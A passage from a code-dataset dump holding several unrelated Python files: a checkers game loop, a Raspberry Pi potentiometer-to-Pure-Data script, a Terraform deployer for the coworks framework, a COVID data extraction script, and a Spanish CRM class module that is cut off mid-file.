black_p_moves) and self.winner == PLAYER_NONE):\n self.do_move(move)\n continue\n\n # If player didn't click on potential move then show them instead.\n self.display_state.highlight_potential_moves(move)\n self.player_states[0].highlight_potential_moves(move)\n self.player_states[1].highlight_potential_moves(move)\n\n# This is the main executable part of the program.\nsys.setrecursionlimit(10000) # Can't go past 10000 recursive depth.\n\n# This is the basic game object\ngame_object = Checkers()\n\n# This is the \"game loop\" of the program, it is an infinite loop that runs the game.\nwhile True:\n game_object.update()\n \n","sub_path":"Project_main.py","file_name":"Project_main.py","file_ext":"py","file_size_in_byte":13518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"502887313","text":"#! /usr/bin/python\n\nfrom gpiozero import MCP3008\nimport os\nfrom time import sleep\n\ndef send2Pd(message=' '):\n os.system(\"echo '\" + message + \"' | pdsend 3000\");\n\nwhile True:\n with MCP3008(channel=0) as pot1:\n print(pot1.value);\n message1 = '1 ' + str(pot1.value) + ';'\n send2Pd(message1)\n\n #sleep(1)\n \n with MCP3008(channel=1) as pot2:\n print(pot2.value);\n message2 = '2 ' + str(pot2.value) + ';'\n send2Pd(message2)\n\n #sleep(1)\n \n with MCP3008(channel=2) as pot3:\n print(pot3.value);\n message3 = '3 ' + str(pot3.value) + ';'\n send2Pd(message3)\n\n #sleep(1)\n \n with MCP3008(channel=3) as pot4:\n print(pot4.value);\n message4 = '4 ' + str(pot4.value) + ';'\n send2Pd(message4)\n\n sleep(0.02)\n","sub_path":"Volume_Pots/python_to_pi_4_POT_TEST.py","file_name":"python_to_pi_4_POT_TEST.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"330883238","text":"from dataclasses import dataclass\n\nimport boto3\nimport click\nimport itertools\nimport logging\nimport sys\nfrom abc import ABC\nfrom pathlib import Path\nfrom threading import Thread\nfrom time import sleep\nfrom typing import List, Optional\n\nfrom coworks.aws import AwsS3Session\nfrom coworks.coworks import Entry\nfrom .command import CwsCommand, CwsCommandError\nfrom .writer import CwsTemplateWriter\nfrom .zip import CwsZipArchiver\nfrom ..config import CORSConfig\n\nUID_SEP = '_'\n\nlogging.getLogger(\"python_terraform\").setLevel(logging.ERROR)\n\n\n@dataclass\nclass TerraformResource:\n parent_uid: str\n path: str\n entries: List[Entry]\n cors: CORSConfig\n\n @property\n def uid(self):\n def remove_brackets(path):\n return f\"{path.replace('{', '').replace('}', '')}\"\n\n if self.path is None:\n return ''\n\n last = remove_brackets(self.path)\n return f\"{self.parent_uid}{UID_SEP}{last}\" if self.parent_uid else last\n\n @property\n def is_root(self):\n return self.path is None\n\n @property\n def parent_is_root(self):\n return self.parent_uid == ''\n\n def __repr__(self):\n return f\"{self.uid}:{self.entries}\"\n\n\nclass CwsTerraformCommand(CwsCommand, ABC):\n WRITER_CMD = 'export'\n\n @property\n def options(self):\n return [\n *super().options,\n click.option('--memory_size', default=128),\n click.option('--timeout', default=30),\n ]\n\n def __init__(self, app=None, **kwargs):\n self.writer_cmd = self.add_writer_command(app)\n super().__init__(app, **kwargs)\n\n def add_writer_command(self, app):\n \"\"\"Default writer command added if not already defined.\"\"\"\n return app.commands.get(self.WRITER_CMD) or CwsTemplateWriter(app)\n\n @classmethod\n def 
generate_terraform_files(cls, step, app, terraform, template, filename, msg, **options):\n debug = options['debug']\n profile_name = options['profile_name']\n aws_region = boto3.Session(profile_name=profile_name).region_name\n\n if debug:\n print(msg)\n output = str(Path(terraform.working_dir) / filename)\n app.execute(cls.WRITER_CMD, template=[template], output=output, aws_region=aws_region,\n step=step, api_resources=cls.terraform_api_resources(app), **options)\n\n @classmethod\n def generate_terraform_resources_list_file(cls, app, terraform, filename, msg, **options):\n debug = options['debug']\n profile_name = options['profile_name']\n aws_region = boto3.Session(profile_name=profile_name).region_name\n if not aws_region:\n raise CwsCommandError(\"No region defined for this profile.\")\n\n if debug:\n print(msg)\n output = Path(terraform.working_dir) / filename\n app.execute(cls.WRITER_CMD, template=[\"resources.j2\"], output=str(output), aws_region=aws_region,\n api_resources=cls.terraform_api_resources(app), **options)\n\n return cls.read_terraform_resources_list_file(terraform, filename, **options)\n\n @classmethod\n def read_terraform_resources_list_file(cls, terraform, filename, **options):\n output = Path(terraform.working_dir) / filename\n with output.open('r') as res_file:\n lines = res_file.readlines()[1:]\n return [line[:-1] for line in lines if line.rstrip()]\n\n @staticmethod\n def terraform_api_resources(app):\n \"\"\"Returns the list of flatten path (prev, last, entry).\"\"\"\n resources = {}\n\n def add_entries(previous, last, entries_: Optional[List[Entry]]):\n ter_entry = TerraformResource(previous, last, entries_, app.config.cors)\n uid = ter_entry.uid\n if uid not in resources:\n resources[uid] = ter_entry\n if resources[uid].entries is None:\n resources[uid].entries = entries_\n return uid\n\n for route, entries in app.entries.items():\n previous_uid = ''\n if route.startswith('/'):\n route = route[1:]\n splited_route = route.split('/')\n\n # special root case\n if splited_route == ['']:\n add_entries(None, None, entries)\n continue\n\n # creates intermediate resources\n last_path = splited_route[-1:][0]\n for prev in splited_route[:-1]:\n previous_uid = add_entries(previous_uid, prev, None)\n\n # set entry keys for last entry\n add_entries(previous_uid, last_path, entries)\n\n return resources\n\n\nclass CwsTerraformDeployer(CwsTerraformCommand):\n \"\"\" Deploiement in 4 steps:\n create\n Step 1. Create API in default workspace (destroys API integrations made in previous deployment)\n Step 2. Create Lambda in stage workspace (destroys API deployment made in previous deployment)\n update\n Step 3. Update API routes integrations\n Step 4. 
Update API deployment\n \"\"\"\n\n ZIP_CMD = 'zip'\n\n @property\n def options(self):\n return [\n *super().options,\n *self.zip_cmd.options,\n click.option('--binary_media_types'),\n click.option('--create', '-c', is_flag=True, help=\"Stop on create step.\"),\n click.option('--dry', is_flag=True, help=\"Doesn't perform deploy [Global option only].\"),\n click.option('--layers', '-l', multiple=True, help=\"Add layer (full arn: aws:lambda:...)\"),\n click.option('--init', '-i', is_flag=True, help=\"Perform terraform initialization.\"),\n click.option('--output', '-o', is_flag=True, help=\"Print terraform output values.\"),\n click.option('--python', '-p', type=click.Choice(['3.7', '3.8']), default='3.8',\n help=\"Python version for the lambda.\"),\n click.option('--update', '-u', is_flag=True, help=\"Only update lambda code [Global option only].\"),\n ]\n\n @classmethod\n def multi_execute(cls, project_dir, workspace, execution_list):\n # Output, dry, create, stop and update are global options\n dry = create = update_lambda_only = output = init = False\n for command, options in execution_list:\n dry = options.pop('dry', False) or dry\n create = options.pop('create', False) or create\n update_lambda_only = options.pop('update', False) or update_lambda_only\n\n # Set default bucket key value\n options['key'] = options['key'] or f\"{options.get('module')}-{command.app.name}/archive.zip\"\n output = output or options.pop('output', False)\n init = init or options.pop('init', False)\n\n terraform = Terraform(init)\n if output: # Stop if only print output\n print(f\"terraform output : {terraform.output()}\", flush=True)\n return\n\n # Transfert zip file to S3 (to be done on each service)\n for command, options in execution_list:\n print(f\"Uploading zip to S3\")\n module_name = options.pop('module_name')\n ignore = options.pop('ignore') or ['.*', 'terraform']\n options.pop('hash')\n command.app.execute(cls.ZIP_CMD, ignore=ignore, module_name=module_name, hash=True, dry=dry, **options)\n\n # Generates default provider\n # cls.generate_common_terraform_files()\n\n # Get all terraform resources\n terraform_api_ressources = []\n for command, options in execution_list:\n terraform_filename = f\"{command.app.name}.{command.app.ms_type}.txt\"\n msg = f\"Generate resources list for {command.app.name}\"\n res = cls.generate_terraform_resources_list_file(command.app, terraform, terraform_filename, msg, **options)\n terraform_api_ressources.extend(res)\n\n # Generates terraform files (create step)\n if not update_lambda_only:\n for command, options in execution_list:\n terraform_filename = f\"{command.app.name}.{command.app.ms_type}.tf\"\n msg = f\"Generate terraform files for creating API and lambdas for {command.app.name}\"\n cls.generate_terraform_files(\"create\", command.app, terraform, \"deploy.j2\", terraform_filename, msg,\n dry=dry, **options)\n\n # Apply terraform if not dry (create API with null resources and lambda step)\n # or in case of only updating lambda code\n if not dry:\n msg = [\"Create or reset API\", f\"Create lambda {workspace}\"]\n cls.terraform_apply(terraform, workspace, terraform_api_ressources, msg)\n\n # Stop on create step if needed\n if create:\n terraform.select_workspace(\"default\")\n return\n\n # Generates terraform files (update step)\n for command, options in execution_list:\n terraform_filename = f\"{command.app.name}.{command.app.ms_type}.tf\"\n msg = f\"Generate terraform files for updating API routes and deploiement for {command.app.name}\"\n 
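# Second pass: the same .tf file is rewritten with step=\"update\" before the final apply below.\n            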
cls.generate_terraform_files(\"update\", command.app, terraform, \"deploy.j2\", terraform_filename, msg,\n dry=dry, **options)\n\n # Apply terraform if not dry (update API routes and deploy step)\n if not dry:\n msg = [\"Update API routes\", f\"Deploy API {workspace}\"]\n cls.terraform_apply(terraform, workspace, terraform_api_ressources, msg,\n update_lambda_only=update_lambda_only)\n\n # Traces output\n print(f\"terraform output : {terraform.output()}\", flush=True)\n\n def __init__(self, app=None, name='deploy'):\n self.zip_cmd = self.add_zip_command(app)\n super().__init__(app, name=name)\n\n def add_zip_command(self, app):\n \"\"\"Default zip command added if not already defined.\"\"\"\n return app.commands.get(self.ZIP_CMD) or CwsZipArchiver(app)\n\n # @staticmethod\n # def generate_common_terraform_files():\n # with open('terraform/default_provider.tf', 'w') as output:\n # print('provider \"aws\" {\\nprofile = \"fpr-customer\"\\nregion = \"eu-west-1\"\\n}', file=output, flush=True)\n\n @staticmethod\n def terraform_apply(terraform, workspace, targets, traces, update_lambda_only=False):\n \"\"\"In the default terraform workspace, we have the API.\n In the specific workspace, we have the corresponding stagging lambda.\n \"\"\"\n stop = False\n\n def display_spinning_cursor():\n spinner = itertools.cycle('|/-\\\\')\n while not stop:\n sys.stdout.write(next(spinner))\n sys.stdout.write('\\b')\n sys.stdout.flush()\n sleep(0.1)\n\n spin_thread = Thread(target=display_spinning_cursor)\n spin_thread.start()\n\n try:\n if not update_lambda_only:\n print(f\"Terraform apply ({traces[0]})\", flush=True)\n terraform.apply(\"default\", targets)\n print(f\"Terraform apply ({traces[1]})\", flush=True)\n terraform.apply(workspace, targets)\n finally:\n stop = True\n\n\nclass CwsTerraformDestroyer(CwsTerraformCommand):\n\n @property\n def options(self):\n return [\n *super().options,\n click.option('--all', '-a', is_flag=True, help=\"Destroy on all workspaces.\"),\n click.option('--bucket', '-b', help=\"Bucket to remove sources zip file from.\", required=True),\n click.option('--debug', is_flag=True, help=\"Print debug logs to stderr.\"),\n click.option('--dry', is_flag=True, help=\"Doesn't perform destroy.\"),\n click.option('--key', '-k', help=\"Sources zip file bucket's name.\"),\n click.option('--profile_name', '-p', required=True, help=\"AWS credential profile.\"),\n ]\n\n @classmethod\n def multi_execute(cls, project_dir, workspace, execution_list):\n for command, options in execution_list:\n command.rm_zip(**options)\n command.terraform_destroy(**options)\n\n def __init__(self, app=None, name='destroy'):\n super().__init__(app, name=name)\n\n def rm_zip(self, *, module, bucket, key, profile_name, dry, debug, **options):\n aws_s3_session = AwsS3Session(profile_name=profile_name)\n\n # Removes zip file from S3\n key = key if key else f\"{module}-{self.app.name}\"\n if debug:\n name = f\"{module}-{options['service']}\"\n where = f\"{bucket}/{key}\"\n print(f\"Removing zip sources of {name} from s3: {where} {'(not done)' if dry else ''}\")\n\n if not dry:\n aws_s3_session.client.delete_object(Bucket=bucket, Key=key)\n aws_s3_session.client.delete_object(Bucket=bucket, Key=f\"{key}.b64sha256\")\n if debug:\n print(f\"Successfully removed sources at s3://{bucket}/{key}\")\n\n def terraform_destroy(self, *, workspace, debug, dry, **options):\n terraform = Terraform(False)\n\n all_workspaces = options['all']\n terraform_resources_filename = f\"{self.app.name}.{self.app.ms_type}.txt\"\n if not dry:\n\n 
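# The resource list file was written at deploy time; if it is missing, the resources were already destroyed.\n            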
# Get terraform resources\n try:\n targets = self.read_terraform_resources_list_file(terraform, terraform_resources_filename, **options)\n except OSError:\n print(f\"The resouces have been already removed ({terraform_resources_filename}).\")\n return\n\n # Destroy resources (except default)\n for w in terraform.workspace_list():\n if w in [workspace] or (all_workspaces and w != 'default'):\n print(f\"Terraform destroy ({w})\", flush=True)\n terraform.destroy(w, targets)\n\n if all_workspaces:\n\n # Remove default workspace\n # --create --dry\n terraform.destroy('default', targets)\n\n # Removes terraform resource file\n output = Path(terraform.working_dir) / terraform_resources_filename\n if debug:\n print(f\"Removing terraform resource file: {output} {'(not done)' if dry else ''}\")\n if not dry:\n output.unlink(missing_ok=True)\n\n # Removes terraform file\n terraform_filename = f\"{self.app.name}.{self.app.ms_type}.tf\"\n output = Path(terraform.working_dir) / terraform_filename\n if debug:\n print(f\"Removing terraform file: {output} {'(not done)' if dry else ''}\")\n if not dry:\n output.unlink(missing_ok=True)\n terraform_filename = f\"{self.app.name}.{self.app.ms_type}.tf\"\n msg = f\"Generate minimal destroy file for {self.app.name}\"\n self.__class__.generate_terraform_files(\"create\", self.app, terraform, \"destroy.j2\", terraform_filename,\n msg, dry=dry, debug=debug, **options)\n\n terraform.select_workspace(\"default\")\n\n\nclass Terraform:\n\n def __init__(self, init):\n from python_terraform import Terraform as PythonTerraform\n\n self.terraform = PythonTerraform(working_dir='terraform')\n Path(self.working_dir).mkdir(exist_ok=True)\n if init:\n return_code, _, err = self.terraform.init(dir_or_plan=self.working_dir)\n if return_code != 0:\n raise CwsCommandError(err)\n\n @property\n def working_dir(self):\n return self.terraform.working_dir\n\n def init(self):\n return_code, _, err = self.terraform.init()\n if return_code != 0:\n raise CwsCommandError(err)\n\n def apply(self, workspace, targets):\n self.select_workspace(workspace)\n return_code, _, err = self.terraform.apply(target=targets, skip_plan=True, input=False, raise_on_error=False,\n parallelism=1)\n if return_code != 0:\n raise CwsCommandError(err)\n\n def destroy(self, workspace, targets):\n self.select_workspace(workspace)\n return_code, _, err = self.terraform.destroy(target=targets)\n if return_code != 0:\n raise CwsCommandError(err)\n\n def output(self):\n self.select_workspace(\"default\")\n values = self.terraform.output(capture_output=True)\n return {key: value['value'] for key, value in values.items()} if values else \"{}\"\n\n def workspace_list(self):\n self.select_workspace(\"default\")\n return_code, out, err = self.terraform.cmd('workspace', 'list')\n if return_code != 0:\n raise CwsCommandError(err)\n values = out[1:].translate(str.maketrans('', '', ' \\t\\r')).split('\\n')\n return filter(None, values)\n\n def select_workspace(self, workspace):\n return_code, out, err = self.terraform.workspace('select', workspace)\n if workspace != 'default' and return_code != 0:\n _, out, err = self.terraform.workspace('new', workspace, raise_on_error=True)\n if not (Path(self.working_dir) / '.terraform').exists():\n self.terraform.init(input=False, raise_on_error=True)\n","sub_path":"coworks/cws/deployer.py","file_name":"deployer.py","file_ext":"py","file_size_in_byte":17251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"603060716","text":"import 
requests\nimport json\nimport urllib.parse\nimport pandas as pd\nfrom configparser import ConfigParser\nfrom datetime import datetime, timedelta\nfrom sqlalchemy import create_engine, text, Table, MetaData, Integer\nfrom sqlalchemy.orm import declarative_base, sessionmaker\nfrom sqlalchemy.schema import Column \nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\napi = \"https://api.data.gov.hk/v2/filter?q=\"\n\nparams2 = '{\"resource\":\"http://www.chp.gov.hk/files/misc/countries_areas_have_reported_cases_eng.csv\", \\\n \"section\":1,\"format\":\"json\",\"filters\":[ [1,\"eq\",[\"09/09/2021\"]] ]}'\n\n# read the read teh params in the config files\nconfigure = ConfigParser()\nprint (configure.read('config.ini'))\nprint (\"Sections : \", configure.sections())\nprint (\"api params : \", configure.get('api_params','resource'))\nprint (\"api params : \", configure.get('api_params','section'))\nprint (\"api params : \", configure.get('api_params','format'))\nprint (\"api params : \", configure.get('api_params','date_col_index'))\nprint (\"api params : \", configure.get('api_params','date_col_filter'))\n\nparams_dic = {}\nparams_dic['resource'] = configure.get('api_params','resource')\nparams_dic['section'] = configure.get('api_params','section')\nparams_dic['format'] = configure.get('api_params','format')\n\n\nfilter_list = []\nfilter_date_col = []\nfilter_date_col.append(configure.get('api_params','date_col_index')) \nfilter_date_col.append(configure.get('api_params','date_col_filter')) \nfilter_date_col.append([ (datetime.now()- timedelta( days= int(configure.get('api_params', 'date_col_time_delta') )))\\\n .strftime(\"%d/%m/%Y\") ]) \nfilter_list.append(filter_date_col)\n\nparams_dic['filters'] = filter_list \n\n\n\"\"\" \nparams_dic = {}\nparams_dic['resource'] = 'http://www.chp.gov.hk/files/misc/countries_areas_have_reported_cases_eng.csv'\nparams_dic['section'] = 1\nparams_dic['format'] = 'json'\n\n\nfilter_list = []\nfilter_date_col = []\nfilter_date_col.append(1) \nfilter_date_col.append('eq') \nfilter_date_col.append([\"09/09/2021\"]) \nfilter_list.append(filter_date_col)\n\nprint(filter_list)\n\nparams_dic['filters'] = filter_list \n\"\"\"\n\njson_param = json.dumps(params_dic)\nprint(json_param)\n\nurl = api + urllib.parse.quote_plus(json_param)\n#print(urllib.parse.quote_plus(params2))\nprint(url)\n\n\njson_data = requests.get(url).json()\n# print(json_data)\n# print(json_data)\n\n\nwith open('data/data.json', 'w') as f:\n json.dump(json_data, f)\n\nprint(json_data[1]['Countries/areas'])\n\nprint(type(json_data))\nprint(len(json_data))\n\n\njson_list = pd.read_json('data/data.json')\nprint(json_list.head(5))\nprint(type(json_list))\n\n\"\"\" for i, row in json_list.iterrows():\n print(row) \"\"\"\n\n\n\n# test the db connections\nengine = create_engine(configure.get('database_connections', 'database_conn_uri'), echo=True)\n\n# just to test the connections\nresult = engine.execute(\n text(\n \"SELECT id \\\n from covid.persons;\"\n )\n)\n\nprint(result)\nprint(f\"Selected {result.rowcount} rows.\")\nfor row in result.fetchall():\n print(row)\n\nBase = declarative_base()\n\n\nmetadata = MetaData(engine,schema=\"covid\")\nmetadata.reflect()\nprint(metadata.tables)\n \nclass persons(Base):\n __table__ = Table(\n 'persons',\n metadata,\n autoload_with=engine\n )\n\nclass persons_nopk(Base):\n __table__ = Table(\n \"persons_nopk\",\n metadata,\n Column(\"ID\", Integer, primary_key=True), \n extend_existing=True\n )\n\nSession = sessionmaker(bind=engine)\nsession = Session()\nres = 
session.query(persons).all()\nprint(type(res))\nfor x in range(len(res)):\n print(res[x].ID)\n print(res[x].LastName)\n print(res[x].FirstName)\n\nres = session.query(persons_nopk).all()\nprint(type(res))\nfor x in range(len(res)):\n print(res[x].ID)\n print(res[x].LastName)\n print(res[x].FirstName)\n \n\"\"\" \nnew_person = persons(\n ID = 5555,\n LastName = 'superman',\n FirstName = 'kksuperman'\n)\n\nsession.add(new_person)\nsession.commit()\n\"\"\"\nvv = session.query(persons).filter(persons.ID == 1234).first()\nprint(vv.ID)\nvv.FirstName = 'vv changed name'\nsession.commit()\n\n# data initialization\nfor x in range(1, 5):\n print(x)\n print((datetime.now() - timedelta(days = x)).strftime(\"%d/%m/%Y\"))\n\n\ndf = pd.read_sql(\"select * from covid.persons\", engine)\nprint(df.head())\n\nx = df['LastName']\ny = df['Age']\n\nsns.barplot(x = x, y =y)\nplt.show()\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"191974174","text":"from enum import Enum\r\nimport colorama\r\nimport datetime\r\nimport dateutil.relativedelta as dr\r\n#from Archivos import Funciones as Fun\r\nimport Archivos.Funciones.GenerarID as Fun\r\nimport Archivos.Funciones.CargarDatos as cd\r\n\r\ndef colores():\r\n diccionario_colores = {\r\n \"lc\": colorama.Fore.LIGHTCYAN_EX,\r\n \"lr\": colorama.Fore.LIGHTRED_EX,\r\n \"lm\": colorama.Fore.LIGHTMAGENTA_EX,\r\n \"ly\": colorama.Fore.LIGHTYELLOW_EX,\r\n \"r\": colorama.Fore.RED,\r\n \"rst\": colorama.Style.RESET_ALL,\r\n \"*\": colorama.Style.BRIGHT\r\n }\r\n return diccionario_colores\r\n\r\n#----------------------------------------------------------------------------------------------------------------------#\r\n# -------------------------------------------------- Enumeraciones --------------------------------------------------- #\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass TipoCliente(Enum):\r\n Cliente = 1 # <- por defecto\r\n Sponsor = 2\r\n Proveedor = 3\r\n\r\nclass TipoActividad(Enum):\r\n Reunion = 1 # <- por defecto\r\n Llamada = 2\r\n Promocion = 3\r\n Informe = 4 # <- no es realizar un informe de gráficas, está enfocado en informar a los clientes\r\n\r\nclass TipoEtapa(Enum):\r\n Nueva = 1 # <- por defecto\r\n Propuesta = 2\r\n Calificada = 3\r\n Ganada = 4\r\n Suspendida = 5\r\n\r\nclass Departamento(Enum):\r\n Comercial = 1 # CRM / Mostrar memes comerciales / Generar PDF\r\n Administrativo = 2 # Todo\r\n Ventas = 3 # Crear/Editar/Descatalogar productos <- CSV\r\n RRHH = 4 # Registrar/Eliminar empleados <- FICHERO\r\n Salud = 5 # Registrar lesiones y actualizar lesiones a lesiones ya curadas <- opcional W.I.P\r\n\r\nclass EstatusProducto(Enum):\r\n Activo = 1 # <- por defecto, en venta\r\n Descatalogado = 2 # <- no se pueden vender productos descatalogados\r\n\r\n\r\n#----------------------------------------------------------------------------------------------------------------------#\r\n# ----------------------------------------------------- Clases ------------------------------------------------------- #\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Persona():\r\n # Una clase padre. Contiene los datos de una persona. 
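# The constructors in this module all repeat the same "None default ->
# fallback" pattern. A minimal, equivalent sketch of that idiom (the class
# name `Ejemplo` is hypothetical), shown once here so the repeated if/else
# blocks below are easier to read:
class Ejemplo:
    def __init__(self, nombre=None, email=None):
        # `x if x is not None else default` collapses each if/else pair
        self.nombre = nombre if nombre is not None else "Test"
        self.email = email if email is not None else "test@test.com"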
Sirve para clientes y empleados.\r\n # No puedo crear múltiples constructores como hacía en Java, así que voy a crear solo uno,\r\n ##### con valores predeterminados que se sobreescriben solos en caso de recibirlos.\r\n # Todas las personas tienen id, pero no es lo mismo un id empleado que un id cliente, por lo que no va aquí\r\n def __init__(self, dni=None, nombre=None, apellidos=None, email=None, fecha_nacimiento=None):\r\n if email is None:\r\n self.email = \"test@test.com\"\r\n else:\r\n self.email = email\r\n\r\n if fecha_nacimiento is None:\r\n self.fecha_nacimiento = \"Unknown\"\r\n else:\r\n self.fecha_nacimiento = fecha_nacimiento\r\n\r\n if apellidos is None:\r\n self.apellidos = \"Prueba\"\r\n else:\r\n self.apellidos = apellidos\r\n\r\n if nombre is None:\r\n self.nombre = \"Test\"\r\n else:\r\n self.nombre = nombre\r\n\r\n if dni is None:\r\n self.dni = \"OOOOOOOOX\"\r\n else:\r\n self.dni = dni\r\n\r\n # Calcula la edad en base a la fecha de nacimiento\r\n def edad(self):\r\n fecha_nac = str(self.fecha_nacimiento)\r\n if fecha_nac != \"Unknown\":\r\n fecha_nac = datetime.datetime.strptime(fecha_nac, '%Y-%m-%d')\r\n hoy = datetime.datetime.today()\r\n try:\r\n cumpleanyos = fecha_nac.replace(year=hoy.year)\r\n except ValueError:\r\n # 29 de febrero en año no bisiesto: se toma el 1 de marzo\r\n cumpleanyos = fecha_nac.replace(year=hoy.year, month=fecha_nac.month + 1, day=1)\r\n if cumpleanyos > hoy:\r\n return hoy.year - fecha_nac.year - 1\r\n else:\r\n return hoy.year - fecha_nac.year\r\n else:\r\n return -1 # <- Tratar el -1 como un error\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Proveedor():\r\n def __init__(self, nif=None, nombre=None, num_ventas=None, id=None):\r\n if nif is None:\r\n self.nif = \"\"\r\n else:\r\n self.nif = nif\r\n if id is None:\r\n self.id = Fun.generar_id_proveedor()\r\n else:\r\n self.id = id\r\n if nombre is None:\r\n self.nombre = \"Error al guardar el nombre\"\r\n else:\r\n self.nombre = nombre\r\n if num_ventas is None:\r\n self.num_ventas = 0\r\n else:\r\n self.num_ventas = num_ventas\r\n\r\n def __str__(self):\r\n return \"{0} ({1}). Número de ventas: {2}\".format(str(self.nombre), str(self.nif), str(self.num_ventas))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Producto():\r\n def __init__(self, nombre=None, descripcion=None, precio=None, estatus_producto=None, proveedor=None, id=None):\r\n if id is None:\r\n self.id = Fun.generar_id_producto()\r\n else:\r\n self.id = id\r\n if nombre is None:\r\n self.nombre = \"Producto sin nombre\"\r\n else:\r\n self.nombre = nombre\r\n if descripcion is None:\r\n self.descripcion = \"\"\r\n else:\r\n self.descripcion = descripcion\r\n if precio is None:\r\n self.precio = 0.0\r\n else:\r\n self.precio = precio\r\n if estatus_producto is None:\r\n self.estatus_producto = EstatusProducto.Activo\r\n else:\r\n self.estatus_producto = estatus_producto\r\n if proveedor is None:\r\n self.proveedor = None\r\n else:\r\n if type(proveedor) is str:\r\n proveedores = cd.cargar_datos_proveedores()\r\n for prov in proveedores:\r\n if prov.id == proveedor:\r\n self.proveedor = prov\r\n else:\r\n self.proveedor = proveedor\r\n\r\n def __str__(self):\r\n return \"{0}. 
{1} - {2} ({3}) | {4}\".format(str(self.id), str(self.nombre), str(self.precio),\r\n str(self.estatus_producto.name), str(self.proveedor.nombre))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Cliente(Persona):\r\n # Participan en actividades.\r\n def __init__(self, dni=None, nombre=None, apellidos=None, email=None, fecha_nacimiento=None, tipocliente=None,\r\n id=None):\r\n Persona.__init__(self, dni, nombre, apellidos, email, fecha_nacimiento)\r\n if id is None:\r\n self.id = Fun.generar_id_cliente()\r\n else:\r\n self.id = id\r\n if tipocliente is None:\r\n self.tipocliente = TipoCliente.Cliente\r\n else:\r\n self.tipocliente = tipocliente\r\n\r\n def __str__(self):\r\n if self.tipocliente != TipoCliente.Cliente:\r\n return \"{0} - {1}, {2}. {3}.\".format(str(self.id), str(self.apellidos), str(self.nombre),\r\n str(self.tipocliente.name))\r\n else:\r\n return \"{0} - {1}, {2}.\".format(str(self.id), str(self.apellidos), str(self.nombre))\r\n\r\n def mostrar_info(self):\r\n c = colores()\r\n cadena = c[\"lc\"] + \"ID: \" + c[\"rst\"] + \"{0}\\n\" + c[\"lc\"] + \"DNI:\" + c[\"rst\"] + \" {1}\\n\" + c[\"lc\"] \\\r\n + \"Nombre: \" + c[\"rst\"] + \"{2}\\n\" + c[\"lc\"] + \"Apellidos: \" + c[\"rst\"] + \"{3}\\n\" \\\r\n + c[\"lc\"] + \"Fecha: \" + c[\"rst\"] + \"{4}\\n\" + c[\"lc\"] + \"Tipo: \" + c[\"rst\"] + \"{5}\"\r\n print(cadena.format(str(self.id), str(self.dni), str(self.nombre), str(self.apellidos),\r\n str(self.fecha_nacimiento), str(self.tipocliente.name)))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Empleado(Persona):\r\n # Organizan/administran actividades.\r\n def __init__(self, dni=None, nombre=None, apellidos=None, email=None, fecha_nacimiento=None, departamento=None,\r\n fecha_contratacion=None, id=None):\r\n Persona.__init__(self, dni, nombre, apellidos, email, fecha_nacimiento)\r\n if id is None:\r\n self.id = Fun.generar_id_empleado()\r\n else:\r\n self.id = id\r\n if departamento is None:\r\n self.departamento = Departamento.Comercial\r\n else:\r\n self.departamento = departamento\r\n if fecha_contratacion is None:\r\n self.fecha_contratacion = \"Unknown\"\r\n else:\r\n self.fecha_contratacion = fecha_contratacion\r\n\r\n def __str__(self):\r\n return \"{0} - {1}, {2}. 
{3}.\".format(str(self.id), str(self.apellidos), str(self.nombre),\r\n str(self.departamento.name))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Usuario():\r\n def __init__(self, usuario=None, contrasenya=None, empleado=None):\r\n self.usuario = usuario\r\n self.contrasenya = contrasenya\r\n self.empleado = empleado\r\n\r\n def __str__(self):\r\n return \"Usuario: {0}\\nContraseña: {1}\\nEmpleado: {2}\".format(str(self.usuario), str(self.contrasenya), str(self.empleado))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Actividad():\r\n def __init__(self, descripcion=None, fecha_vencimiento=None, fecha_planificacion=None, tipoactividad=None,\r\n id=None):\r\n if id is None:\r\n self.id = Fun.generar_id_actividad()\r\n else:\r\n self.id = id\r\n\r\n if tipoactividad is None:\r\n self.tipoactividad = TipoActividad.Reunion\r\n else:\r\n self.tipoactividad = tipoactividad\r\n\r\n if descripcion is None:\r\n self.descripcion = \"No tiene descripción.\"\r\n else:\r\n self.descripcion = descripcion\r\n\r\n if fecha_planificacion is None:\r\n self.fecha_planificacion = datetime.date.today()\r\n else:\r\n self.fecha_planificacion = fecha_planificacion\r\n\r\n if fecha_vencimiento is None:\r\n fecha = datetime.date.today()\r\n fecha = fecha + dr.relativedelta(days=7)\r\n self.fecha_vencimiento = fecha\r\n\r\n else:\r\n self.fecha_vencimiento = fecha_vencimiento\r\n\r\n def __str__(self):\r\n return \"{0} - {1}, {2}. {3}\".format(str(self.id), str(self.tipoactividad.name), str(self.fecha_vencimiento),\r\n str(self.descripcion))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Informe():\r\n # El informe relaciona la actividad con una lista de clientes (participan) y empleados (administran)\r\n def __init__(self, actividad=None, clientes=None, empleados=None, id=None):\r\n self.__actividad = actividad\r\n if id is None:\r\n self.__id = Fun.generar_id_informe()\r\n else:\r\n self.__id = id\r\n if actividad is None:\r\n self.__actividad = \"\"\r\n else:\r\n self.__actividad = actividad\r\n if clientes is None:\r\n self.__clientes = []\r\n else:\r\n self.__clientes = clientes\r\n if empleados is None:\r\n self.__empleados = []\r\n else:\r\n self.__empleados = empleados\r\n\r\n def __str__(self):\r\n return str(self.__id), str(self.__actividad)\r\n\r\n # Como quiero mostrar los clientes y empleados, en vez de to string haré una función específica\r\n def mostrar_informe(self):\r\n c = colores()\r\n print(c[\"ly\"] + \"Informe: \" + c[\"rst\"] + str(self.__id))\r\n print(c[\"ly\"] + \"Actividad: \" + 